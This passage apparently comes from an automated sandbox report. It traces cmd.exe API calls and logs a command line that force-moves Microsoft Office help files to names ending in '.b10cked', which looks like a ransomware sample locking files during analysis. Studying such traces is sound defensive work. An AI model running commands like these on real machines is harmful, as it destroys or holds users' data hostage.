lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.179] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.179] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.179] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.179] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.179] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.179] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.179] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.179] GetEnvironmentStringsW () returned 0x3222e8* [0202.179] FreeEnvironmentStringsW (penv=0x3222e8) returned 1 [0202.179] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.179] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.179] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.179] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.179] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.179] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.179] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.180] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.180] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af790 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.180] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af790, lpFilePart=0x1af78c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af78c*="Desktop") returned 0x18 [0202.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af50c | out: lpFindFileData=0x1af50c) returned 0x320028 [0202.180] FindClose (in: hFindFile=0x320028 | out: hFindFile=0x320028) returned 1 [0202.180] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.181] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.181] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.181] GetEnvironmentStringsW () returned 0x322b08* [0202.181] FreeEnvironmentStringsW (penv=0x322b08) returned 1 [0202.181] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.181] GetConsoleOutputCP () returned 0x1b5 [0202.182] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.182] GetUserDefaultLCID () returned 0x409 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x23, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="0") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="0") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8d0, cchData=128 | out: lpLCData="1") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.182] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.182] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.183] GetConsoleTitleW (in: lpConsoleTitle=0x3108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.183] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.183] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.183] GetProcAddress (hModule=0x76910000, 
lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.183] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.184] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.184] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.184] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.184] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.184] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.184] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.184] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.187] GetConsoleTitleW (in: lpConsoleTitle=0x1af5c8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.187] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.187] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.187] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.187] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.187] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.187] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.187] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.187] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.187] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.187] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.187] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.187] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.187] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.188] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.188] _wcsicmp (_String1="move", 
_String2="RMDIR") returned -5 [0202.188] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.188] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.188] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.188] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.188] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.188] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.188] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.188] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.188] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.188] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.188] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.188] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.189] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.189] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af384, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af37c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af37c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) 
returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.190] 
_wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.190] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.191] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.191] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.191] _wcsicmp (_String1="MSMSAC~2.HXN", _String2=".") returned 63 [0202.191] _wcsicmp (_String1="MSMSAC~2.HXN", _String2="..") returned 63 [0202.191] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~2.hxn")) returned 0x2022 [0202.191] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e60 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.191] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", nBufferLength=0x104, lpBuffer=0x1aed0c, lpFilePart=0x1aecf4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", lpFilePart=0x1aecf4*="MSMSAC~2.HXN") returned 0x27 [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.192] _wcsicmp (_String1="MSMSAC~2.HXN", _String2=".") returned 63 [0202.192] _wcsicmp (_String1="MSMSAC~2.HXN", _String2="..") returned 63 [0202.192] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmsac~2.hxn")) returned 0x2022 [0202.192] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) 
returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", nBufferLength=0x104, lpBuffer=0x1af188, lpFilePart=0x1aef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", lpFilePart=0x1aef20*="MSMSAC~2.HXN") returned 0x27 [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.192] SetErrorMode (uMode=0x0) returned 0x0 [0202.192] SetErrorMode (uMode=0x1) returned 0x0 [0202.192] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x1af390, lpFilePart=0x1aef20 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked", lpFilePart=0x1aef20*="MS.MSACCESS.DEV.14.1033.hxn.b10cked") returned 0x3e [0202.192] SetErrorMode (uMode=0x0) returned 0x1 [0202.193] SetLastError (dwErrCode=0x0) [0202.193] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSACCESS.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.msaccess.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0202.193] GetLastError () returned 0x2 [0202.193] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae89c) returned 0x310e98 [0202.193] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ae89c | out: lpFindFileData=0x1ae89c) returned 0 [0202.193] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.193] GetLastError () returned 0x12 [0202.193] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x1ae89c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ae89c) returned 0x310e98 [0202.194] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x1ae89c | out: lpFindFileData=0x1ae89c) returned 0 [0202.194] FindClose (in: hFindFile=0x310e98 | out: 
hFindFile=0x310e98) returned 1 [0202.194] GetLastError () returned 0x12 [0202.194] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0202.194] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0202.194] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.195] GetLastError () returned 0x12 [0202.195] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSAC~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x321c00, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321c00) returned 0x310e98 [0202.195] FindNextFileW (in: hFindFile=0x310e98, lpFindFileData=0x321c00 | out: lpFindFileData=0x321c00) returned 0 [0202.195] FindClose (in: hFindFile=0x310e98 | out: hFindFile=0x310e98) returned 1 [0202.195] GetLastError () returned 0x12 [0202.195] _get_osfhandle (_FileHandle=2) returned 0xb [0202.195] GetFileType (hFile=0xb) returned 0x2 [0202.578] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.578] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1aea6c | out: lpMode=0x1aea6c) returned 1 [0202.578] _get_osfhandle (_FileHandle=2) returned 0xb [0202.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1aeaa0 | out: lpConsoleScreenBufferInfo=0x1aeaa0) returned 1 [0202.578] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.579] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1aeae0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.579] WriteConsoleW (in: 
hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x1aeac4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1aeac4*=0x2c) returned 1 [0202.580] longjmp () [0202.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.580] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.580] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.580] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.580] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.580] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.580] SetConsoleInputExeNameW () returned 0x1 [0202.580] GetConsoleOutputCP () returned 0x1b5 [0202.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.580] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.580] exit (_Code=1) Process: id = "466" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xc2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSOU~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSOUC.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29246 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 
29247 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29248 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29249 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29250 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29251 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29252 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29253 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29254 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29255 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30245 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30246 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30247 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = 
mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30248 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 30249 start_va = 0x480000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 30250 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30251 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30252 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30253 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30254 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30255 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30256 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: 
"c:\\windows\\system32\\usp10.dll") Region: id = 30257 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 30258 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30259 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 30260 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30261 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30262 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 30263 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 30264 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 30265 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 30266 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 30267 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 30268 start_va = 0x1180000 end_va = 
